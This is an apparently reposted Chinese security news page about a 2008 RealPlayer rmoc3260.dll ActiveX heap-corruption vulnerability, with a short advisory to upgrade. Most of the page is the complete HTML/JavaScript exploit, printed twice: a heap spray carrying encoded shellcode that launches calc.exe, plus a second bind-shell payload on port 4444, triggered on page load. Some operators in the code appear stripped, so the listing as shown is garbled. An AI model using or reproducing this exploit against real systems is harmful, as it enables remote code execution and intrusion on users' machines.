RealPlayer又曝新漏洞
网络安全 2021-07-03 10:02www.168986.cn网络安全知识
RealPlayer的漏洞问题越来越严重,milworm在昨天发布了一个Real Player 控件溢出漏洞。在环境 Windows XP SP2(fully patched) English, IE6测试成功运行calc。
该漏洞存在于rmoc3260.dll,并且只有 version 6.0.10.45可以被成功执行漏洞攻击。
在最新版本以及旧版本没有办法成功执行该漏洞。该DLL版本对应的REAL版本号为6.0.14.748。请使用6.0.14.748版本的用户尽快安装新版本。
发布日期:2008-4-2
更新日期:2008-4-2 12:37(GMT)
real又报新洞。。。漏洞组件rmoc3260.dll版本6.0.10.45
程序代码
<!--
Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit(Heap Corruption)
written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, rmoc3260.dll version 6.0.10.45
Thanks to h.d.m. and the Metasploit crew
-->
<html>
<head>
<title>Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit</title>
<script language="JavaScript" defer>
function Check() {
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949"
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a"
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241"
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c"
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c"
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f"
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b"
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c"
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831"
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955"
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b"
"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b"
"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44"
"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35"
"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530"
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b"
"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c"
"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63"
"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f"
"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377"
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f"
"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035"
"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653"
"%u314e%u7475%u7038%u7765%u4370");
// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.
var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949"
"%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a"
"%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241"
"%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c"
"%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f"
"%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c"
"%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f"
"%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b"
"%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c"
"%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31"
"%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35"
"%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b"
"%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663"
"%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733"
"%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470"
"%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358"
"%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f"
"%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458"
"%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58"
"%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f"
"%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275"
"%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45"
"%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033"
"%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046"
"%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035"
"%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036"
"%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64"
"%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35"
"%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67"
"%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30"
"%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f"
"%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246"
"%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139"
"%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652"
"%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e"
"%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b"
"%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075"
"%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251"
"%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f"
"%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f"
"%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b"
"%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952"
"%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73"
"%u684f%u3956%u386f%u4350");
var bigblock = unescape("%u0C0C%u0C0C");
var headersize = 20;
var slackspace = headersize shellcode1.length;
while (bigblock.length < slackspace) bigblock = bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length slackspace < 0x40000) block = block block fillblock;
var memory = new Array();
for (i = 0; i < 400; i ){ memory[i] = block shellcode1 }
var buf = '';
while (buf.length < 32) buf = buf unescape(" ");
var m = '';
m = obj.Console;
obj.Console = buf;
obj.Console = m;
m = obj.Console;
obj.Console = buf;
obj.Console = m;
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="obj">
Unable to create object
</object>
</body>
</html>
该漏洞存在于rmoc3260.dll,并且只有 version 6.0.10.45可以被成功执行漏洞攻击。
在最新版本以及旧版本没有办法成功执行该漏洞。该DLL版本对应的REAL版本号为6.0.14.748。请使用6.0.14.748版本的用户尽快安装新版本。
发布日期:2008-4-2
更新日期:2008-4-2 12:37(GMT)
real又报新洞。。。漏洞组件rmoc3260.dll版本6.0.10.45
程序代码
<!--
Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit(Heap Corruption)
written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, rmoc3260.dll version 6.0.10.45
Thanks to h.d.m. and the Metasploit crew
-->
<html>
<head>
<title>Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit</title>
<script language="JavaScript" defer>
function Check() {
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949"
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a"
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241"
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c"
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c"
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f"
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b"
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c"
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831"
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955"
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b"
"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b"
"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44"
"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35"
"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530"
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b"
"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c"
"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63"
"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f"
"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377"
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f"
"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035"
"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653"
"%u314e%u7475%u7038%u7765%u4370");
// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.
var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949"
"%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a"
"%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241"
"%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c"
"%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f"
"%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c"
"%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f"
"%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b"
"%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c"
"%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31"
"%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35"
"%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b"
"%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663"
"%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733"
"%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470"
"%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358"
"%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f"
"%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458"
"%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58"
"%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f"
"%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275"
"%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45"
"%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033"
"%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046"
"%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035"
"%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036"
"%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64"
"%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35"
"%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67"
"%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30"
"%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f"
"%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246"
"%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139"
"%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652"
"%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e"
"%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b"
"%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075"
"%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251"
"%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f"
"%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f"
"%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b"
"%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952"
"%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73"
"%u684f%u3956%u386f%u4350");
var bigblock = unescape("%u0C0C%u0C0C");
var headersize = 20;
var slackspace = headersize shellcode1.length;
while (bigblock.length < slackspace) bigblock = bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length slackspace < 0x40000) block = block block fillblock;
var memory = new Array();
for (i = 0; i < 400; i ){ memory[i] = block shellcode1 }
var buf = '';
while (buf.length < 32) buf = buf unescape(" ");
var m = '';
m = obj.Console;
obj.Console = buf;
obj.Console = m;
m = obj.Console;
obj.Console = buf;
obj.Console = m;
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="obj">
Unable to create object
</object>
</body>
</html>
网络安全培训
- 网络安全带来的危害 网络安全的弊处
- 如何加强网络安全防范
- 网络安全防护知识内容摘要
- 什么网络安全指的是什么 网络安全指的是什么意
- 网络安全十大公司排名 网络安全十大公司排名绿
- 手机网络安全警示格言 手机网络安全警示教育片
- 网络安全培训心得体会 网络安全知识培训
- 如何树立正确的网络意识 怎么样正确对待网络
- 网络安全大赛是什么意思 网络安全大赛比赛规则
- 世界网络安全公司排名 世界十大网络安全上市公
- 网络安全注意事项知识 网络安全注意事项知识短
- 网络安全常识十条口诀 小学生安全十句话
- 网络安全等级保护三级 网络安全三级等保标准
- 如何增强网络安全防范意识 如何增强网络安全防
- 网络安全注意事项有哪些 网络安全应注意事项
- 网络安全培训感悟 网络安全培训后的收获和感想